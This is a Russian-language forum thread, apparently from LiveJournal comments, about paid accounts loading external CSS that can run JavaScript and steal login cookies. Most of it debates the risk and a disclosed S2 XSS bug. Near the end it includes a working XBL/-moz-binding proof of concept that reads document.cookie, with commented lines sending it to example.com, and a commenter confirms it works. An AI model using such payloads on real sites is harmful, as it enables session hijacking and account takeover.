Сперва разрешили подключать внешние CSS, в которых может быть скрипт, который в IE может украсть куки.

Ну это уж проблема браузера.

P.S. А кстати, как такое можно провернуть?

Проблемы браузера 80% пользователей - это уже проблемы сервиса.

так надо) скоро разрешат втыкать еще и флеш %) за что тогда люди платят деньги если им нельзя и флешку в дизайн воткнуть???

у экслера работают поблажки платных аккаунтов, на сколько я понимаю.

а вообще презентативная аудитория ЖЖ не знает тех слов, что ты написал =)

Т. е. куки в ЖЖ не воруют, а покупают у администрации? ;-)

Синхронно =)

То есть за десять долларов можно тырить куки ЖЖ-пользователей?

надо их еще заставить зайти в свой журнал :)

Я думаю, даже в моём занюханном журнале на титульной странице в день бывают десятки пользователей.

осталось оплатить аккаунт и вперед :)

Мне неинтересно красть куки, мне интересна безопасность.

в данном случае о проблеме безопасности должны заботиться не юзеры

О чём я и написал в посте, ага?

алилуя :)

я в принципе могу понять логику создателей ЖЖ в этом вопросе.

платный аккаунт позиционируется как собственная домашняя страница, а не блог на чужом сервере. отсюда и вольность в наполнении.

единственная проблема в том, что эта домашняя страница делит куки с сервером блогов.

если читать через RSS и открывать только отдельные записи, которые у меня идут со стандартным интерфейсом, то можно немного снизить опасность. Возможно, гже-нибудь есть галочка, которая отключает авторские шаблоны, надо порыться.

Если общий курс на налпевательство, то завтра они не станут затыкать очередную дыру в cleanhtml.pl, и воровать куки можно будет из комментария.

да, но тут все зависит от целей, если защититься, то ищем решение, если поднять волну возмущения, то я готов поддержать, только как?

Да как самому защититься -- вопрос примерно пятый. Продвинутые пользователи сумеют.

Вопрос в том, что создаётся большая дыра, которую кто-нибудь в один прекрасный момент с размаху использует -- и порушит часть ценной коммуникативной среды, состоящей не только из продвинуиых пользователей.

так а в чем тогда дело, напишите как защититься и научите всех, это как раз поможет заткнуть дырку. Или интересней чужие ошибки пообсуждать? Тоже можно, но только надо сначала определиться что мы делаем то.

да и мне кажется что все как то сильно преувеличено, чем сервер ЖЖ отличается от обычного сайта? Есть такие, где заразу намного проще подцепить. С cookie есть некоторая проблема, т.к. все страницы на одном домене, то cookie вытаскиваются легко, но что потом с ними делать то можно? Неужели там нет привязки к IP? Или кто-нибудь уже знает алгоритм его генерации чтобы вытащить нужную инфу и залогиниться с любого компьютера? Я за такими вещами не слежу, неужели это так?
Ну а остальные перечисленные проблемы они у любого сайта есть, так что теперь в веб не ходить?

Чтобы получилась нормальная защита, меры должны быть приняты администрацией ЖЖ: путём ли изменения схемы авторизации, путём ли замены подключения javascript-а или фильтрации его. Лично я мало что могу на эту тему сделать, я там не работаю.

С кукой можно много что сделать -- она к IP не привязывается у большинства. Не уверен, что её хватит сменить пароль и email (там пароль по новой запрашивается), но понаписать ерунды или всё поудалять -- хватит.

>С кукой можно много что сделать -- она к IP не привязывается у большинства.
ну так это же уже не проблемы сервиса? Он настроить это позволяет, а перевоспитывать пользователей - не его задача. Единственно что - могли бы по умолчанию сделать - привязка к IP. Как уже обсуждали ниже от многих проблем спасает.

Его задача - обеспечить безопасную коммуникационную среду, он с этим не справляется иногда.

к сожалению у него другая задача - бабла срубить. Тех кто знает о наличии дыр в безопасности не так уж и много и они попадают в разряд - проще на них забить, т.к. они все равно будут недовольны. Спасение утопающих как говориться...

С ЖЖ что-то вобще поганенькое творится. Если раньше платный пользователь - это благодарный пользователь способный платить (а ему за это парочку фишечек давали), то сейчас ЖЖ все больше и больше расширяет пропасть между платными и бесплатными гоняясь, видимо, за прибылью. А в такой погоне все средства хороши, тем более можно забыть о какой то там безопасности. О ней все равное никто не помнит.

ну дык у тех же платников куки тоже будут воровать.
так что это просто их недосмотр, как мне кажецо.

может это специально для экслера?

Фрэнк козни экслеру строит.

стопудово!

>>Давно ЖЖ стало наплевать на безопасность?
Давно.

А подробнее?

Месяца два как. То ли действительно за объемом платных юзеров гонятся, то ли просто пофигизм проснулся.
Бесплатным вот предлагает пароли менять - т.е. "у вас в пароле цифир нету". Т.е. берется открытый пароль, проверяется регуляркой...
Тот же openID.
Еще много чего.

1. Что-то я не понял, в чём криминал с OpenID и проверкой паролей. В чём он?

2. Что ещё случилось в последние два месяца?

1.1.Смысл доверять пользователю на основании трастовой ссылки?
1.2.Уж не знаю, применимо ли ко всем, но лично у меня схема "храним хеш+салт - генерим новый при компрометации" сидит уже разве что не в подкорке. А тут популярный сервис еще раз тычет под нос "а у нас он в открытую лежит, да мы еще его пользуем по-разному". Напрягло.
2.Это не ко мне. Это в системные сообщества. Мое мнение: после видимого усиления безопасности летом (у бесплатников в head даже слово behavior писать запретили:) сейчас пошел явный спад. Или выгораживание платных аккаунтов, кому как больше нравится.

При платном аккаунте в ЖЖ можно делать свои собственные стили, в которых писать всё, что угодно. Почитайте про преимущества платников.

Ну а про «хакерские» CSS и JavaScript — проблема браузеров, но не сервиса. Я как раз таки платил за то, чтобы сильно перекроить вид моего жжурнала.

Ну а про «хакерские» CSS и JavaScript — проблема браузеров, но не сервиса.
Получение JS куки — это не "хакерский" JS.

Заметили да, что я взял в кавычки?

Какая разница. Как может быть проблемой браузера получение куки средствами JS?

Ну я вообще-то не про куки имел ввиду, а вообще про баги. К примеру, сравнительно недавний баг с получением каких-то там данных в FF.

Зачем цепляться-то?

А где я к словам-то цепляюсь?

Я как раз таки платил за то, чтобы сильно перекроить вид моего жжурнала.
Т.е. фактически вы соглашаетесь с тем, что пофиг мне кто-что будет воровать, я хочу "перекроить вид". Я просто указал, что чиать куки можно вполне законно получается.

Мне действительно пофиг, кто там у кого что ворует.

Т.е. вам пофиг, что у вас украдут доступ к вашему журналу?

Я мало захожу на титульные страницы, всё через френдоленту. Да и пусть получают доступ — не жалко. Только, кому сдался мой жжурнал?

Пусть тысячники там сидят дрожат :-)

Когда напишут скрипт для массового взлома, кисло может стать кому угодно.

Вспомним "колбасу".

А что за «колбаса»?

Был такой скрипт, который при прочтении поста добавлял в его хвост имя читателя (получалась "колбаса" из имён). Без всякой инициативы читателя, разумеется. Использовалась дырка в ЖЖ. Хорошо, что ради шутки, а могли бы и что поинтереснее красть, пароль, например. (Не сам пароль, а идентифицирующую куку -- но "угнать" журнал хватило бы.)

О как, спасибо :-)

а как же привязка к IP

Не думаю, что у многих она стоит.

в чем ужас получения куки с livejournal.com? А для того, чтобы cookie других доменов нельзя было получать из дневника на ЖЖ - включаем одну галочку в настройках браузера.

в чем ужас получения куки с livejournal.com?
тем, что могут доступ к вашему журналу получить.

А для того, чтобы cookie других доменов нельзя было получать из дневника на ЖЖ - включаем одну галочку в настройках браузера.
Галочку, хм.

>тем, что могут доступ к вашему журналу получить
Есть где описание атаки? Или хотя бы опишите принцип в двух словах. На всякий случай - у меня привязка к IP.

>Галочку, хм.
да, и работает замечательно.

Есть где описание атаки? Или хотя бы опишите принцип в двух словах. На всякий случай - у меня привязка к IP.
Так и атаки-то нет. Просто читаете куку и всё.

да, и работает замечательно.
Вобще всегда думал, что "cookie других доменов нельзя получать" и без галочки.

а, ну да, эта запрещает ставить cookie, поторопился

>Так и атаки-то нет. Просто читаете куку и всё.
Неужели? Вам прислать мою куку и вы сможете добавить в мой дненивк запись? Куда присылать?

Неужели? Вам прислать мою куку и вы сможете добавить в мой дненивк запись? Куда присылать?
Вобщем-то да, но у вас же привязка к ip.

а яваскриптом нельзя по-другому нагадить? френда добавить, коммент удалить?

А фиг его знает. Теоретически, вроде да.

в этом случае будет спрашивать подтверждение, над которым вражеский jscript вроде уже не будет иметь власти. Но надо проверять, если возможно, то с этим в lj-dev и пусть затыкают, а дискусий по поводу cookie там и так уже много, судя по гуглу/

какое такое подтверждение чтоб френда добавить?

прошлый раз когда жеже облажался с безопасностью как раз и добавляли себя во френды в качестве прикола - джаваскрипт прописывался в сss, по-поему

поизучал сорцы, вижу в форме редактирования вот это:
input type='hidden' name="lj_form_auth" value="c0...." - т.е. вроде прикрыли дырку.

ну так все таки сможете получить доступ с привязкой к IP или нет? Прямо ответьте.

С привязкой к IP — нет.

Брр... Непонимаю. Бред какой-то.

Аккаунт у меня paid user, точно такой же т.е.. Сейчас как раз сижу учу S2, увидел запись, тут же побежал проверить. Вставил в Page::print() (самая главная функция) кусочек:"""
<script type="text/javascript">
window.status = "$title";
</script>
</head>
<body>
""";И ЖЖ'шный cleanhtml.pm весь скрипт аккуратненько вырезал, как и положено. Аналогично, разумеется, происходит если и в body пихать, а не в head. Почему у Экслера код там спокойно держится я никак не могу понять. Единственное объяснение что приходит в голову - что тот блок sidebar'а куда он пихнул js почему-то ошибочно является trusted layer'ом, где очистка не производится. =/

Уфф. Нашёл где ошибка :) Этакое подобие XSS в S2, если я правильно понял принцип как оно работает. Хотя понял я это очень смутно. =/

Отправил багрепорт им, пусть разбираются сами.

В Вашем баг-репорте ясно указано, что это не что-нибудь, а дырка в безопасности? Особенно если Вы писали в суппорт. Меня просто удручает уровень сообразительности тамошних добровольцев: они могут не моргнув глазом сказать, что так и надо, вместо того, чтобы оповестить bradfitz@lj, evan@lj и dormando@lj, как положено (http://www.livejournal.com/doc/html/support.html#security).

Да, всё чётко указано что это явная ошибка, как она воспроизводится и какова предположительная причина её появления.

Я по дурости написал это в support, не видел тогда этого документа, а при отправлении заявки там про такие случаи ни слова, но все равно, как положено - добровольцы рассказывать баек не стали, запрос перевели в приватную категорию ("This is a private request. It is not publicly visible.") с пометкой "Support category: Webmaster". Буду надеяться, дальше программисты ЖЖ там разберутся...

Документ, на который я сослался, — это инструкции для добровольцев support’а, так что формально Вы все правильно сделали. Я бы не стал полагаться на support и отправил бы ссылку на Ваш тамошний запрос по почте вышеупомянутым товарищам (указав в сабже, что это про LJ security), но это скорее дело вкуса.

Всё, сегодня пришло письмо ночью, пишут что с багой разобрались и заделали.

Это радует!

О дырках в безопасности они просят (http://www.livejournal.com/doc/html/support.html#security) сообщать по почте напрямую пользователям bradfitz@lj, evan@lj и dormando@lj. Напишете?

drdaeman@lj написал, пока я в поезде сутки ехал.

Кроме того, JS во внешнем CSS они не закрывают, несмотря на багрепорты.

А где те баг-репорты про JS во внешнем CSS найти? Может быть, их задавили не врубившиеся добровольцы суппорта или какие-нибудь непрофессиональные разработчики ЖЖ, чтоб им всем было долго хорошо? Хотелось бы убедиться, что кто-то понимающий, например bradfitz@lj, видел и понял баг-репорт и осознанно не хочет отключать внешний CSS.

Нашел, что в 2002 году они обещали хорошо себя вести (http://www.livejournal.com/news/2002-05-qa.bml#q40).

Оно конечно может быть, но фиг знает.

Вот те же zmey2@lj и drdaeman@lj тут лучше осведомлены, насколько я помню.

а дыру во внешнем css надо полагать, ещё не закрыли?

Эту дырку открыли почти год назад. Еще не закрыли.

по теме ссылочки
http://www.livejournal.com/community/lj_dev/634193.html
http://www.livejournal.com/users/news/86532.html?thread=25396228

>> Сперва разрешили подключать внешние CSS, в которых может быть скрипт, который в IE может украсть куки.

Почему только в IE?
-moz-binding:url("http://example.com/test.xml#test") !important;

А разве она через границы доменов работает? У IE приходилось код встраивать через expression() или behavior: expression() и писать скрипт внутри CSS'ки, т.к. код хранится на домене, отличном от livejournal.com. С Mozilla я пробовал XBL использовать, но или у меня руки кривые были или тоже ограничения, но ничего не выходило просто.

Когда-то получилось, но на все сто не уверен (в прямизне своих рук тоже сомневаюсь; мог с привелегиями попутать чего). Попробуйте, если интересно:

HTML-<style/>
@import url("http://example.com/test.css");
/* ..OR.. *:root {-moz-binding:url("http://example.com/test.xml#test") !important} */

test.css
*:root {-moz-binding:url("test.xml#test") !important}

test.xml
<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl">
<binding id="test"><implementation>
<constructor><![CDATA[
alert(document.cookie);
//var s = document.createElement("script");
//document.documentElement.appendChild(s);
//s.src = "http://example.com/test.js?cookie="+escape(document.cookie);
//var i = document.createElement("img");
//i.src = "http://example.com/test.png?cookie="+escape(document.cookie);
//document.documentElement.appendChild(i);
]]></constructor>
</implementation></binding>
</bindings>

...и о результатах, если не трудно. Узнать ответ на этот вопрос в любом случае интересно. :)

Сейчас вспомнил, попробовал… А ведь работает, зараза.

Значит и под IE и под Opera и под Fx можно утащить куки из ЖЖ. -_-

О, хорошо. В смысле, ничего хорошего, конечно, а спасибо за подтверждение.

http://www.livejournal.com/users/haker_huyaker/

meta refresh

куда катиццо этот мирсервис...

http://www.livejournal.com/users/goblin_gaga/842933.html

понеслась